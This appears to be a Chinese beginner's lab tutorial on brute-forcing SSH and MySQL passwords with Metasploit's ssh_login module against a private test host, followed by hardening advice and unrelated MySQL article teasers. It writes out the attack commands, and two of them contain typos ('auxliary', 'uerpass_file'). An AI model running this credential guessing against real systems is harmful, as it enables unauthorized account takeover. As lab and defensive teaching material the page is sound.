百度360必应搜狗淘宝本站头条
grid 设置导航栏dedecms模版移位运算context xml
当前位置:网站首页 > 文章教程 > 正文

爆破SSH/MySQL账户竟如此简单

xsobi 2025-01-09 16:50 1 浏览

友情提示:

初入安全,小白一个,本文重在学习与经验分享!

背景

使用Kali自带的MSF工具对SSH的账号密码进行爆破。

1. 实验环境

本次实验通过MSF,可直接对SSH的账号密码进行爆破。

Kali IP:192.168.0.10/24,或者安装有MSF漏洞利用框架工具的计算机

靶机 IP:192.168.0.11/24

靶机系统版本:CentOS 6.5

2.爆破说明

用MSF爆破SSH或者MySQL账户信息时,最好使用多线程。因为实验,所以使用的诠释弱密码。真正在生产环境中,遇到弱密码的情况较少,一是要使用大字典,二是确保主机性能够强,三是要有耐心.

3. SSH密码爆破过程

3.1 SSH模块搜索

(1)启动MSF,并搜索SSH相关的模块

(2)使用ssh_login模块进行密码爆破

use auxliary/scanner/ssh/ssh_login

# 查看参数配置项

show options

# 指定密码字典文件

set pass_file /root/password.txt

# 指定爆破的主机

set rhosts 192.168.0.11

# 指定爆破主机的用户名或者用户名字典文件

set username root //指定用户名为root

set uerpass_file /root/username.txt //指定用户名字典文件

# 指定爆破端口,SSH协议默认是22。如果用户修改了端口号,可以通过NMAP等工具探测其开放的端口。

set RPORT 22

# 执行爆破

run

(3)成功爆出root用户的密码

4. 安全建议

(1)增加用户口令的复杂度以及长度。

(2)增加用户频繁试错登录次数限制,如:5次试错登录后锁定账户1小时等措施。

(3)限制远程SSH管理的IP地址段或者IP地址,确保最小化原则。

5. 爆破番外MySQL篇

爆破MySQL数据库用户密码的过程与SSH爆破过程是一样的,只不过使用的MSF模块不同。鉴于数据库的重要性,建议不开启数据库的远程管理(内网或外网)。如业务需要必须开启内网远程管理,也要严格限制远程管理的IP地址段或IP地址,确保最小化原则。并且,严格限制不同用户的权限。

相关推荐

全网最详细解决Windows下Mysql数据库安装后忘记初始root 密码方法

一、准备重置root的初始化密码Win+R键启动命令输入窗口;输入cmd打开命令执行窗口;##界面如下##输入命令:netstopmysqld#此操作会停止当前运行的...

Spring Boot数据库密码加密的配置方法

前言由于系统安全的考虑,配置文件中不能出现明文密码的问题,本文就给大家详细介绍下springboot配置数据库密码加密的方法,下面话不多说了,来一起看看详细的介绍吧...

Mysql 8.4数据库安装、新建用户和数据库、表单

1、下载MySQL数据库yuminstall-ywgetperlnet-toolslibtirpc#安装wget和perl、net-tools、libtirpcwgethtt...

mysql5.7安装教程

首先下载mysql的rpm包wgethttps://mirrors.ustc.edu.cn/mysql-ftp/Downloads/MySQL-5.7/mysql-community-client...

MySQL管理授权和数据库的备份和还原详解

一般管理用户和授权由DBA去执行,DBA为数据库管理员一、管理用户1.添加用户...

数据库迁移有什么技巧?|分享强大的database迁移和同步工具

概述DBConvertStudio是一款强大的跨数据库迁移和同步软件,可在不同数据库格式之间转换数据库结构和数据。它将成熟、稳定、久经考验的DBConvert和DBSync核心与改进的现代...

Mysql解压版安装过程

Mysql是目前软件开发中使用最多的关系型数据库,具体安装步骤如下:第一步:Mysql官网下载最新版(mysql解压版(mysql-5.7.17-winx64)),Mysql官方下载地址为:https...

MySQL5.7升级到8.0过程详解

前言:不知不觉,MySQL8.0已经有好多个GA小版本了。目前互联网上也有很多关于MySQL8.0的内容了,MySQL8.0版本基本已到稳定期,相信很多小伙伴已经在接触8.0了。本篇文章主要介绍从5....

10种常见的MySQL错误,你可中招?

【51CTO.com快译】如果未能对MySQL8进行恰当的配置,您非但可能遇到无法顺利访问、或调用MySQL的窘境,而且还可能给真实的应用生产环境带来巨大的影响。本文列举了十种MySQL...

忘记MySQL密码怎么办?一招教你搞定

在安装完MySQL或者是在使用MySQL时,最尴尬的就是忘记密码了,墨菲定律也告诉我们,如果一件事有可能出错,那么它一定会出错。那如果我们不小心忘记了MySQL的密码,该如何处理呢?别着急...

Windows 安装解压版本的 MySql

1、下载解压版本的MySql到https://downloads.mysql.com/archives/community/网站,根据自己需要安装的版本进行选择下载,这里下载不要选择MSII...

爆破SSH/MySQL账户竟如此简单

友情提示:初入安全,小白一个,本文重在学习与经验分享!背景使用Kali自带的MSF工具对SSH的账号密码进行爆破。1.实验环境本次实验通过MSF,可直接对SSH的账号密码进行爆破。KaliIP:1...

Mysql8忘记密码/重置密码

Mysql8忘记密码/重置密码UBUNTU下Mysql8忘记密码/重置密码步骤如下:先说下大概步骤:修改配置文件,使得用空密码可以进入mysql。然后置当前root用户为空密码。再次修改配置文件,不能...

wamp查看MySQL密码 MySQL console输入密码闪退 重置mysql密码

wampserver的MySQL数据库用户名为root初始密码为空,但是部分同学通过MySQLconsole访问数据库输入密码的时候出现窗口闪退,常见的问题是原来有改过密码或者你的配置文件要求密码不...

Mysql数据库操作指引(六)——账号密码及权限管理

简介:在MySQL数据库中,为了保证数据的安全性,数据管理员需要根据需要创建账户,并为每个账户赋予不同的权限,以满足不同用户的需求。...

一周热门
最近发表
标签列表